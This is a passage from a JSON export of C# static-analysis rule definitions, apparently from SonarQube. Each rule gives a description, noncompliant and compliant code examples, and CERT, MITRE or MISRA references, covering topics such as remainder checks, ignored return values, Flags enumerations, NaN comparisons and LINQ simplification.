Thus, comparing the remainder of a variable for\nequality with a positive number (or a negative one) can give unexpected results. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic bool IsOdd(int x)\n{\n  return x % 2 == 1;  \/\/ Noncompliant; if x is an odd negative, x % 2 == -1\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic bool IsOdd(int x)\n{\n  return x % 2 != 0;\n}\n<\/pre>\n<p>or<\/p>\n<pre>\npublic bool IsOdd(uint x)\n{\n  return x % 2 == 1;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/xAHAAQ\">CERT, NUM51-J.<\/a> - Do not assume that the remainder operator always returns a\n  nonnegative result for integral operands <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NQBi\">CERT, INT10-C<\/a> - Do not assume a positive remainder when using the % operator\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/_YBLAQ\">CERT, INT10-CPP.<\/a> - Do not assume a positive remainder when using the %\n  operator <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2201","repo":"csharpsquid","name":"Return values from functions without side effects should not be ignored","htmlDesc":"<p>When the call to a function doesn't have any side effects, what is the point of making the call if the results are ignored? In such a case, either\nthe function call is useless and should be dropped or the source code doesn't behave as expected.<\/p>\n<p>This rule raises an issue when the results of the following methods are ignored:<\/p>\n<ul>\n  <li> LINQ methods, <\/li>\n  <li> <code>[Pure]<\/code> methods, <\/li>\n  <li> any method on <code>string<\/code>, <code>int<\/code>, ..., <code>System.Collections.Immutable.ImmutableArray&lt;T&gt;<\/code>,\n  <code>ImmutableHashSet&lt;T&gt;<\/code>, ... 
<\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ncoll.Where(i =&gt; i &gt; 5).Select(i =&gt; i*i); \/\/ Noncompliant\n\"this string\".Equals(\"other string\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar res = coll.Where(i =&gt; i &gt; 5).Select(i =&gt; i*i);\nvar isEqual = \"this string\".Equals(\"other string\");\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule doesn't report issues on method calls with <code>out<\/code> or <code>ref<\/code> arguments.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2012, 17.7 - The value returned by a function having non-void return type shall be used <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/9YIRAQ\">CERT, EXP12-C.<\/a> - Do not ignore values returned by functions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/eoAyAQ\">CERT, EXP12-CPP.<\/a> - Do not ignore values returned by functions or methods\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/9gEqAQ\">CERT, EXP00-J.<\/a> - Do not ignore values returned by methods <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2225","repo":"csharpsquid","name":"\"ToString()\" method should not return null","htmlDesc":"<p>Calling <code>ToString()<\/code> on an object should always return a string. 
Returning <code>null<\/code> instead contravenes the method's implicit\ncontract.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic override string ToString ()\n{\n  if (this.collection.Count == 0)\n  {\n    return null; \/\/ Noncompliant\n  }\n  else\n  {\n    \/\/ ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic override string ToString ()\n{\n  if (this.collection.Count == 0)\n  {\n    return string.Empty;\n  }\n  else\n  {\n    \/\/ ...\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/476.html\">MITRE CWE-476<\/a> - NULL Pointer Dereference <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2228","repo":"csharpsquid","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate void DoSomething ()\n{\n  \/\/ ...\n  Console.WriteLine (\"so far, so good...\"); \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"VULNERABILITY"},{"key":"csharpsquid:S2325","repo":"csharpsquid","name":"Methods and properties that don't access instance data should be static","htmlDesc":"<p>Class methods and properties that don't access instance data can be <code>static<\/code> to prevent any misunderstanding about the contract of the\nmethod. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Utilities\n{\n  public int MagicNum \/\/ Noncompliant\n  {\n    get\n    {\n      return 42;\n    }\n  }\n\n  private static string magicWord = \"please\";\n  public string MagicWord  \/\/ Noncompliant\n  {\n    get\n    {\n      return magicWord;\n    }\n    set\n    {\n      magicWord = value;\n    }\n  }\n\n  public int Sum(int a, int b)  \/\/ Noncompliant\n  {\n    return a + b;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Utilities\n{\n  public static int MagicNum\n  {\n    get\n    {\n      return 42;\n    }\n  }\n\n  private static string magicWord = \"please\";\n  public static string MagicWord\n  {\n    get\n    {\n      return magicWord;\n    }\n    set\n    {\n      magicWord = value;\n    }\n  }\n\n  public static int Sum(int a, int b)\n  {\n    return a + b;\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2342","repo":"csharpsquid","name":"Enumeration types should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all <code>enum<\/code> names match a provided regular\nexpression.<\/p>\n<p>The default configuration is the one recommended by Microsoft:<\/p>\n<ul>\n  <li> Pascal casing, starting with an upper case character, e.g. BackColor <\/li>\n  <li> Short abbreviations of 2 letters can be capitalized, e.g. GetID <\/li>\n  <li> Longer abbreviations need to be lower case, e.g. GetHtml <\/li>\n  <li> If the enum is marked as [Flags] then its name should be plural (e.g. MyOptions), otherwise, names should be singular (e.g. 
MyOption) <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression for non-flags enums: <code>^([A-Z]{1,3}[a-z0-9]+)*([A-Z]{2})?$<\/code><\/p>\n<pre>\npublic enum foo \/\/ Noncompliant\n{\n    FooValue = 0\n}\n<\/pre>\n<p>With the default regular expression for flags enums: <code>^([A-Z]{1,3}[a-z0-9]+)*([A-Z]{2})?s$<\/code><\/p>\n<pre>\n[Flags]\npublic enum Option \/\/ Noncompliant\n{\n    None = 0,\n    Option1 = 1,\n    Option2 = 2\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic enum Foo\n{\n    FooValue = 0\n}\n<\/pre>\n<pre>\n[Flags]\npublic enum Options\n{\n    None = 0,\n    Option1 = 1,\n    Option2 = 2\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[{"key":"format","htmlDesc":"Regular expression used to check the enumeration type names against.","defaultValue":"^([A-Z]{1,3}[a-z0-9]+)*([A-Z]{2})?$","type":"STRING"},{"key":"flagsAttributeFormat","htmlDesc":"Regular expression used to check the flags enumeration type names against.","defaultValue":"^([A-Z]{1,3}[a-z0-9]+)*([A-Z]{2})?s$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S2345","repo":"csharpsquid","name":"Flags enumerations should explicitly initialize all their members","htmlDesc":"<p>Flags enumerations should not rely on the language to initialize the values of their members. Implicit initialization will set the first member to\n0, and increment the value by one for each subsequent member. This implicit behavior does not allow members to be combined using the bitwise or\noperator in a useful way.<\/p>\n<p>Instead, 0 and powers of two (i.e. 1, 2, 4, 8, 16, ...) 
should be used to explicitly initialize all the members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n[Flags]\nenum FruitType    \/\/ Noncompliant\n{\n  None,\n  Banana,\n  Orange,\n  Strawberry\n}\nclass Program\n{\n    static void Main()\n    {\n        var bananaAndStrawberry = FruitType.Banana | FruitType.Strawberry;\n        \/\/ Will display only Strawberry! Banana is 1 and Strawberry is 3, so 1 | 3 == 3 == Strawberry.\n        Console.WriteLine(bananaAndStrawberry.ToString());\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n[Flags]\nenum FruitType\n{\n  None = 0,\n  Banana = 1,\n  Orange = 2,\n  Strawberry = 4\n}\nclass Program\n{\n    static void Main()\n    {\n        var bananaAndStrawberry = FruitType.Banana | FruitType.Strawberry;\n        \/\/ Will display \"Banana, Strawberry\", as expected.\n        Console.WriteLine(bananaAndStrawberry.ToString());\n    }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The default initialization of 0, 1, 2, 3, 4, ... matches 0, 1, 2, 4, 8 ... in the first three values, so no issue is reported if only the first three\nmembers of the enumeration are not initialized.<\/p>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2346","repo":"csharpsquid","name":"Flags enumerations zero-value members should be named \"None\"","htmlDesc":"<p>Consistent use of \"None\" in flags enumerations indicates that all flag values are cleared. 
The value 0 should not be used to indicate any other\nstate, since a zero value has no bit set and its presence can therefore never be tested with a bitwise and: <code>(flags &amp; FruitType.Void) != 0<\/code>\nis always false.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n[Flags]\nenum FruitType\n{\n    Void = 0,        \/\/ Non-Compliant\n    Banana = 1,\n    Orange = 2,\n    Strawberry = 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n[Flags]\nenum FruitType\n{\n    None = 0,        \/\/ Compliant\n    Banana = 1,\n    Orange = 2,\n    Strawberry = 4\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2365","repo":"csharpsquid","name":"Properties should not make collection or array copies","htmlDesc":"<p>Most developers expect property access to be as efficient as field access. However, if a property returns a copy of an array or collection, it will\nbe much slower than a simple field access, contrary to the caller's likely expectations. Therefore, such properties should be refactored into methods\nso that callers are not surprised by unexpectedly poor performance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate List&lt;string&gt; _foo = new List&lt;string&gt; { \"a\", \"b\", \"c\" };\npublic IEnumerable&lt;string&gt; Foo  \/\/ Noncompliant\n{\n    get\n    {\n        return _foo.ToList();\n    }\n}\n\nprivate string[] _bar = new string[] { \"a\", \"b\", \"c\" };\npublic IEnumerable&lt;string&gt; Bar \/\/ Noncompliant\n{\n    get\n    {\n        return (string[])_bar.Clone();\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprivate List&lt;string&gt; _foo = new List&lt;string&gt; { \"a\", \"b\", \"c\" };\nprivate string[] _bar = new string[] { \"a\", \"b\", \"c\" };\n\npublic IEnumerable&lt;string&gt; GetFoo()\n{\n    return _foo.ToList();\n}\n\npublic IEnumerable&lt;string&gt; GetBar()\n{\n    return 
(string[])_bar.Clone();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2376","repo":"csharpsquid","name":"Write-only properties should not be used","htmlDesc":"<p>Properties with only setters are confusing and counterintuitive. Instead, a property getter should be added if possible, or the property should be\nreplaced with a setter method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Program\n{\n    public int Foo  \/\/ Non-Compliant\n    {\n        set\n        {\n            \/\/ ... some code ...\n        }\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Program\n{\n    private int foo;\n\n    public void SetFoo(int value)\n    {\n        \/\/ ... some code ...\n        foo = value;\n    }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Program\n{\n  public int Foo { get; set; } \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2436","repo":"csharpsquid","name":"Classes and methods should not have too many generic parameters","htmlDesc":"<p>A method or class with too many type parameters has likely aggregated too many responsibilities and should be split.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default parameter value of 2:<\/p>\n<pre>\nvoid Foo&lt;S, T, U, V&gt;() {} \/\/ Noncompliant; not really readable\nFoo&lt;string, int, object, string&gt;(); \/\/ especially on invocations\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[{"key":"max","htmlDesc":"Maximum authorized number of generic parameters.","defaultValue":"2","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S2486","repo":"csharpsquid","name":"Generic exceptions should not be ignored","htmlDesc":"<p>When exceptions occur, it is usually a bad idea to simply ignore them. 
Instead, it is better to handle them properly, or at least to log them.<\/p>\n<p>This rule only reports on empty catch clauses that catch generic <code>Exception<\/code>s.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstring text = \"\";\ntry\n{\n  text = File.ReadAllText(fileName);\n}\ncatch (Exception exc) \/\/ Noncompliant\n{\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstring text = \"\";\ntry\n{\n  text = File.ReadAllText(fileName);\n}\ncatch (Exception exc)\n{\n  logger.Log(exc);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, it is not considered to be empty.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/391.html\">MITRE, CWE-391<\/a> - Unchecked Error Condition <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2589","repo":"csharpsquid","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) \/\/ Noncompliant\n{\n  DoSomething();\n}\n\nif (b &amp;&amp; a) \/\/ Noncompliant; \"a\" is always \"true\"\n{\n  DoSomething();\n}\n\nif (c || !a) \/\/ Noncompliant; \"!a\" is always \"false\"\n{\n  DoSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (Foo(a))\n{\n  DoSomething();\n}\n\nif (b)\n{\n  DoSomething();\n}\n\nif (c)\n{\n  DoSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. 
<\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2688","repo":"csharpsquid","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. 
Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = double.NaN;\n\nif (a == double.NaN) \/\/ Noncompliant; always false\n{\n  Console.WriteLine(\"a is not a number\");  \/\/ this is dead code\n}\nif (a != double.NaN)  \/\/ Noncompliant; always true\n{\n  Console.WriteLine(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (double.IsNaN(a))\n{\n  Console.WriteLine(\"a is not a number\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2692","repo":"csharpsquid","name":"\"IndexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>IndexOf<\/code> value compare it with -1 because 0 is a valid index. Any checks which look for values\n<code>&gt;0<\/code> ignore the first element, which is likely a bug. 
If the intent is merely to check inclusion of a value in a <code>string<\/code>,\n<code>List<\/code>, or an array, consider using the <code>Contains<\/code> method instead.<\/p>\n<p>This rule raises an issue when an <code>IndexOf<\/code> value retrieved from a <code>string<\/code>, <code>List<\/code>, or array is tested against\n<code>&gt;0<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstring color = \"blue\";\nstring name = \"ishmael\";\n\nList&lt;string&gt; strings = new List&lt;string&gt;();\nstrings.Add(color);\nstrings.Add(name);\nstring[] stringArray = strings.ToArray();\n\nif (strings.IndexOf(color) &gt; 0) \/\/ Noncompliant\n{\n  \/\/ ...\n}\nif (name.IndexOf(\"ish\") &gt; 0) \/\/ Noncompliant\n{\n  \/\/ ...\n}\nif (name.IndexOf(\"ae\") &gt; 0) \/\/ Noncompliant\n{\n  \/\/ ...\n}\nif (Array.IndexOf(stringArray, color) &gt; 0) \/\/ Noncompliant\n{\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstring color = \"blue\";\nstring name = \"ishmael\";\n\nList&lt;string&gt; strings = new List&lt;string&gt; ();\nstrings.Add(color);\nstrings.Add(name);\nstring[] stringArray = strings.ToArray();\n\nif (strings.IndexOf(color) &gt; -1)\n{\n  \/\/ ...\n}\nif (name.IndexOf(\"ish\") &gt;= 0)\n{\n  \/\/ ...\n}\nif (name.Contains(\"ae\"))\n{\n  \/\/ ...\n}\nif (Array.IndexOf(stringArray, color) &gt;= 0)\n{\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2696","repo":"csharpsquid","name":"Instance members should not write to \"static\" fields","htmlDesc":"<p>Correctly updating a <code>static<\/code> field from a non-static method is tricky to get right and could easily lead to bugs if there are multiple\nclass instances and\/or multiple threads in play. 
<\/p>\n<p>This rule raises an issue each time a <code>static<\/code> field is updated from a non-static method or property.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class MyClass\n{\n  private static int count = 0;\n\n  public void DoSomething()\n  {\n    \/\/...\n    count++;  \/\/ Noncompliant\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2757","repo":"csharpsquid","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs ( <code>=+<\/code>, <code>=-<\/code> or <code>=\\!<\/code> ) where the reversed, single operator was meant (<code>+=<\/code>,\n<code>-=<\/code> or <code>\\!=<\/code>) will compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code>, <code>=-<\/code>, or <code>=!<\/code> is used without any spacing between the two operators and when\nthere is at least one whitespace character after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nint target = -5;\nint num = 3;\n\ntarget =- num;  \/\/ Noncompliant; target = -3. Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nint target = -5;\nint num = 3;\n\ntarget = -num;  \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2760","repo":"csharpsquid","name":"Sequential tests should not check the same condition","htmlDesc":"<p>When the same condition is checked twice in a row, it is either confusing - why have separate checks? 
- or an error - some other condition should\nhave been checked in the second test.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (a == b)\n{\n  doTheThing(b);\n}\nif (a == b) \/\/ Noncompliant; is this really what was intended?\n{\n  doTheThing(c);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a == b)\n{\n  doTheThing(b);\n  doTheThing(c);\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nif (a == b)\n{\n  doTheThing(b);\n}\nif (b == c)\n{\n  doTheThing(c);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Since it is a common pattern to test a variable, reassign it if it fails the test, then re-test it, that pattern is ignored.<\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2933","repo":"csharpsquid","name":"Fields that are only assigned in the constructor should be \"readonly\"","htmlDesc":"<p><code>readonly<\/code> fields can only be assigned in a class constructor. If a class has a field that's not marked <code>readonly<\/code> but is\nonly set in the constructor, it could cause confusion about the field's intended use. 
To avoid confusion, such fields should be marked\n<code>readonly<\/code> to make their intended use explicit, and to prevent future maintainers from inadvertently changing their use.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Person\n{\n  int _birthYear;  \/\/ Noncompliant\n  Person(int birthYear)\n  {\n    _birthYear = birthYear;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Person\n{\n  readonly int _birthYear;\n  Person(int birthYear)\n  {\n    _birthYear = birthYear;\n  }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Fields with attributes are ignored.<\/p>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2955","repo":"csharpsquid","name":"Generic parameters not constrained to reference types should not be compared to \"null\"","htmlDesc":"<p>When constraints have not been applied to restrict a generic type parameter to be a reference type, then a value type, such as a\n<code>struct<\/code>, could also be passed. In such cases, comparing the type parameter to <code>null<\/code> would always be false, because a\n<code>struct<\/code> can be empty, but never <code>null<\/code>. If a value type is truly what's expected, then the comparison should use\n<code>default()<\/code>. 
If it's not, then constraints should be added so that no value type can be passed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate bool IsDefault&lt;T&gt;(T value)\n{\n  if (value == null) \/\/ Noncompliant\n  {\n    \/\/ ...\n  }\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprivate bool IsDefault&lt;T&gt;(T value)\n{\n  if(object.Equals(value, default(T)))\n  {\n    \/\/ ...\n  }\n  \/\/ ...\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nprivate bool IsDefault&lt;T&gt;(T value) where T : class\n{\n  if (value == null)\n  {\n    \/\/ ...\n  }\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2971","repo":"csharpsquid","name":"\"IEnumerable\" LINQs should be simplified","htmlDesc":"<p>In the interests of readability, code that can be simplified should be simplified. To that end, there are several ways <code>IEnumerable\nLINQ<\/code>s can be simplified<\/p>\n<ul>\n  <li> Use <code>OfType<\/code> instead of using <code>Select<\/code> with <code>as<\/code> to type cast elements and then null-checking in a query\n  expression to choose elements based on type. <\/li>\n  <li> Use <code>OfType<\/code> instead of using <code>Where<\/code> and the <code>is<\/code> operator, followed by a cast in a <code>Select<\/code> <\/li>\n  <li> Use an expression in <code>Any<\/code> instead of <code>Where(element =&gt; [expression]).Any()<\/code>. <\/li>\n  <li> Use <code>Count<\/code> instead of <code>Count()<\/code> when it's available. <\/li>\n  <li> Don't call <code>ToArray()<\/code> or <code>ToList()<\/code> in the middle of a query chain. 
<\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nseq1.Select(element =&gt; element as T).Any(element =&gt; element != null);  \/\/ Noncompliant; use OfType\nseq2.Select(element =&gt; element as T).Any(element =&gt; element != null &amp;&amp; CheckCondition(element));  \/\/ Noncompliant; use OfType\nseq3.Where(element =&gt; element is T).Select(element =&gt; element as T); \/\/ Noncompliant; use OfType\nseq4.Where(element =&gt; element is T).Select(element =&gt; (T)element); \/\/ Noncompliant; use OfType\nseq5.Where(element =&gt; [expression]).Any();  \/\/ Noncompliant; use Any([expression])\n\nvar num = seq6.Count(); \/\/ Noncompliant\nvar arr = seq.ToList().ToArray(); \/\/Noncompliant\nvar count = seq.ToList().Count(x=&gt;[condition]); \/\/Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nseq1.OfType&lt;T&gt;().Any();\nseq2.OfType&lt;T&gt;().Any(element =&gt; CheckCondition(element));\nseq3.OfType&lt;T&gt;();\nseq4.OfType&lt;T&gt;();\nseq5.Any(element =&gt; [expression])\n\nvar num = seq6.Count;\nvar arr = seq.ToArray();\nvar count = seq.Count(x=&gt;[condition]);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2997","repo":"csharpsquid","name":"\"IDisposables\" created in a \"using\" statement should not be returned","htmlDesc":"<p>Typically you want to use <code>using<\/code> to create a local <code>IDisposable<\/code> variable; it will trigger disposal of the object when\ncontrol passes out of the block's scope. The exception to this rule is when your method returns that <code>IDisposable<\/code>. In that case\n<code>using<\/code> disposes of the object before the caller can make use of it, likely causing exceptions at runtime. 
So you should either remove\n<code>using<\/code> or avoid returning the <code>IDisposable<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic FileStream WriteToFile(string path, string text)\n{\n  using (var fs = File.Create(path)) \/\/ Noncompliant\n  {\n    var bytes = Encoding.UTF8.GetBytes(text);\n    fs.Write(bytes, 0, bytes.Length);\n    return fs;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic FileStream WriteToFile(string path, string text)\n{\n  var fs = File.Create(path);\n  var bytes = Encoding.UTF8.GetBytes(text);\n  fs.Write(bytes, 0, bytes.Length);\n  return fs;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3010","repo":"csharpsquid","name":"Static fields should not be updated in constructors","htmlDesc":"<p>Assigning a value to a <code>static<\/code> field in a constructor could cause unreliable behavior at runtime since it will change the value for all\ninstances of the class.<\/p>\n<p>Instead remove the field's <code>static<\/code> modifier, or initialize it statically.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Person\n{\n  private static DateTime dateOfBirth;\n  private static int expectedFingers;\n\n  public Person(DateTime birthday)\n  {\n    dateOfBirth = birthday;  \/\/ Noncompliant; now everyone has this birthday\n    expectedFingers = 10;  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Person\n{\n  private DateTime dateOfBirth;\n  private static int expectedFingers = 10;\n\n  public Person(DateTime birthday)\n  {\n    this.dateOfBirth = birthday;\n  }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3052","repo":"csharpsquid","name":"Members should not be initialized to default values","htmlDesc":"<p>The compiler automatically initializes class fields, auto-properties and events to their default values before setting them with any 
initialization\nvalues, so there is no need to explicitly set a member to its default value. Further, under the logic that cleaner code is better code, it's\nconsidered poor style to do so.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass X\n{\n  public int field = 0; \/\/ Noncompliant\n  public object o = null; \/\/ Noncompliant\n  public object MyProperty { get; set; } = null; \/\/ Noncompliant\n  public event EventHandler MyEvent = null;  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass X\n{\n  public int field;\n  public object o;\n  public object MyProperty { get; set; }\n  public event EventHandler MyEvent;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p><code>const<\/code> fields are ignored.<\/p>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3169","repo":"csharpsquid","name":"Multiple \"OrderBy\" calls should not be used","htmlDesc":"<p>There's no point in chaining multiple <code>OrderBy<\/code> calls in a LINQ; only the last one will be reflected in the result because each\nsubsequent call completely reorders the list. Thus, calling <code>OrderBy<\/code> multiple times is a performance issue as well, because all of the\nsorting will be executed, but only the result of the last sort will be kept.<\/p>\n<p>Instead, use <code>ThenBy<\/code> for each call after the first. 
